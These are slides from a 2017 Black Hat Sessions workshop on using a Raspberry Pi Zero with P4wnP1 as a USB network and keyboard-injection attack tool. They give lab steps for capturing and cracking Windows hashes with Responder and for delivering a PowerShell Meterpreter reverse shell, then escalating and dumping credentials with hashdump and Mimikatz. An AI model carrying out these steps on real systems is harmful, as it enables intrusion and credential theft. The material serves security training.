Weaponizing the Raspberry Pi Zero - Black Hat Sessions 2017 · The almighty Raspberry Pi Zero W •...
Transcript of Weaponizing the Raspberry Pi Zero - Black Hat Sessions 2017 · The almighty Raspberry Pi Zero W •...
Weaponizing the Raspberry Pi Zero
Black Hat Sessions XV
Welcome!
28/06/2017 2
Niels VonkSecurity Consultant
Vestdijk 595611 CA Eindhoven
E-mail: [email protected]: 06 – 5751 6677
Ben BrückerSecurity Consultant
Vestdijk 595611 CA Eindhoven
E-mail: [email protected]: 06 – 2694 9189
Agenda
• Latest attack platforms
• The Raspberry Pi Zero
• Various attack methods
• Demo 1 – Responder
• Demo 2 – Meterpreter
28/06/2017 3
Hardware attack platforms
28/06/2017 4
Attack vectors
28/06/2017 5
HID attacks
• Attack started to get popular around 2010
• Main development by Andrian Crenshaw (IronGeek), Darren Kitchen (Hak5) and Dave Kennedy (TrustedSec)
• Allows attackers to interface with systems as a keyboard
• Plug-and-Play for known OS
28/06/2017 6
Network interface attacks
• Attached as USB device acts as an network interface
• Installation without user interaction
• Hi-jacks priority via metrics
• Ability to launch network based attacks
28/06/2017 7
The almighty Raspberry Pi Zero W
• 1GHz, single-core CPU
• 512MB RAM
• Mini HDMI and USB On-The-Go ports
• Micro USB power
• 802.11 b/g/n wireless LAN
• Bluetooth 4.1
• Bluetooth Low Energy (BLE)
28/06/2017 8
P4wnP1
• Developed by Marcus Mengs (MaMe82)• https://github.com/mame82/P4wnP1
• Transforms a cheap Pi into a complete attack platform
• Support for:• HID attacks
• Network attacks
• Data transfers
• Cross interaction between Pi and target
28/06/2017 9
P4wnP1 – Network attack
• For Windows targets it will act as a RNDIS interface
• For Linux/Mac targets it will act as a CDC ECM interface
• Creates priority via metrics of the interfaces
28/06/2017 10
P4wnP1 - HID attack
• Plug-and-play installation posing as keyboard
• Ability to change the PID and VID for whitelist bypassing
• Can write exploits/backdoors on the target via the keyboard
• Allows in memory execution via PowerShell
28/06/2017 11
Demo non-tech guide
• Login to the Pi via Secure Shell Protocol (SSH)
• Edit the configuration file to select the correct payload
• Plug the Pi into the target via the USB port
• Wait and see the payload execute
• Retrieve the Pi
• Power on the Pi and login to the Pi via Secure Shell Protocol (SSH)
• Inspect your loot
• Crack the hash to retrieve the password
28/06/2017 12
Responder attacks
28/06/2017 13
Demo 1 - Responder
• P4wnP1 will install itself as a network device
• P4wnP1 will give an IP address to the target
• Routes will be set to redirect traffic to the P4wnP1
• Responder will start on the P4wnP1
• Client will try to connect to a non-existing share
• Responder will capture the authentication hash
• Win!
28/06/2017 14
Demo 1 – Responder (prep)
• Use PuTTY to SSH into your Pi• IP address of your Pi = 192.168.1.1<number on your Pi>
• Edit the setup file using the command:• nano ~/P4wnP1/setup.cfg
• and make sure that the line with PAYLOAD=responder is not commented out. (PAYLOAD=responder instead of #PAYLOAD=responder)
• Save the file via the following hotkey:• CTRL+X Y ENTER
• Inspect the payload using the command • nano ~/P4wnP1/payloads/responder
• Attach the P4wnP1 via the USB port to the target
28/06/2017 15
Demo 1 – Responder (action)
• Use PuTTY to SSH into your Pi• IP address of your Pi = 192.168.1.1<number on your Pi>
• Run the following commando to see Responder:• sudo screen –x
• Inspect behaviour and verify the payload has executed
• Exit the screen session using:• CTRL+A D
28/06/2017 16
Demo 1 – Responder (P4wn)
• Now we are going to crack the retrieved hash via the following command:• /home/pi/P4wnP1/crack_last_responder.sh
• This command will run John the Ripper versus a wordlist to retrieve the password
• Win!
28/06/2017 17
Demo non-tech guide
• Login to the Pi via Secure Shell Protocol (SSH)
• Edit the configuration file to select the correct payload
• Create malicious code
• Insert created code in the payload
• Plug the Pi into the target via the USB port
• Wait and see the payload execute
• Retrieve the Pi
• Interact with the target via a remote connection that is create via the malicious code
28/06/2017 18
Meterpreter attack
• Generate malicious code on attack machine
• Deliver this code via various methods on the target
• This code will run on the target machine and connect back to the attacker thus bypassing ingress firewall filtering
• Via this tunnel we can interact and execute command on the target machine
28/06/2017 19
Demo 2 - Meterpreter
• P4wnP1 will install itself as a HID device
• Upon installation of the drivers the payload will be executed
• Script will start a shell with admin privileges
• The Meterpreter payload will be typed out as an base64 encoded string
• Powershell will decode the base64 string and execute in memory
• Creates a reverse_tcp shell to MSF listener
• Win!
28/06/2017 20
Demo 2 - Meterpreter (prep)
• Use PuTTY to SSH into your Pi• IP address of your Pi = 192.168.1.1<number on your Pi>
• Edit the setup file via the command:• nano ~/P4wnP1/setup.cfg
• and make sure that the line with PAYLOAD=meterpreter is not commented out. • (PAYLOAD=meterpreter instead of #PAYLOAD=meterpreter)
• Save the fle via the following hotkey:• CTRL+X Y
• Inspect the payload via the command • nano ~/P4wnP1/payloads/meterpreter
28/06/2017 21
Demo 2 - Meterpreter (prep)
• Use PuTTY to SSH into the Metasploit server• IP address of the Metasploit server = 192.168.1.100
• Run the following command to generate a payload:• bash payload_generator.sh
• Copy the output starting at:• %COMSPEC% /b /c start /b /min powershell.exe
• Now we are going to replace the old payload in the meterpreterfile on the Pi• nano ~/P4wnP1/payloads/meterpreter
• Search for the line starting with:• STRING %COMSPEC% /b /c start
28/06/2017 22
Demo 2 - Meterpreter (prep)
• Remove this line via the following hotkey• CTRL+K
• Paste the payload by clicking the right mouse button
• Save the file via the following hotkey:• CTRL+X Y
28/06/2017 23
Demo 2 - Meterpreter (prep)
• Now back on the Metasploit server run the following command:• msfconsole –r msf_receiver.rc
• This will start the Meterpreter handler to receive incoming connections
• Attach the P4wnP1 via the USB port to the target
28/06/2017 24
Demo 2 - Meterpreter (action)
• The script will create an elevated Powershell session
• The payload will be typed out by the Pi
• Upon activation a new session should appear on the MSF server
• Access the session via the command:• sessions –i <id>
28/06/2017 25
Demo 2 - Meterpreter (P4wn)
• Now that we have a interactive shell lets see what we can do
• Run the command getuid to retrieve the current user
• Get SYSTEM privileges with getsystem
• We can now dump the password hashes with hashdump
• But wait! We not dump them plain text ☺
• Run load kiwi to start the newest version of Mimikatz• Now execute the command creds_all
28/06/2017 26
28/06/2017 27
Questions?
28/06/2017 28
Other usages
• Malware installation on airgapped systems
• Extraction of files from target computer
• Pivot into internal networks
• Man-in-the-Middle attacks
28/06/2017 29
Future plans
• Let the P4wnP1 connect to your mobile devices over WiFi/Bluetooth from real-time access and interaction
• Create new samples for the payload
• More advanced staged exploits that will create a permanent foothold in the network
28/06/2017 30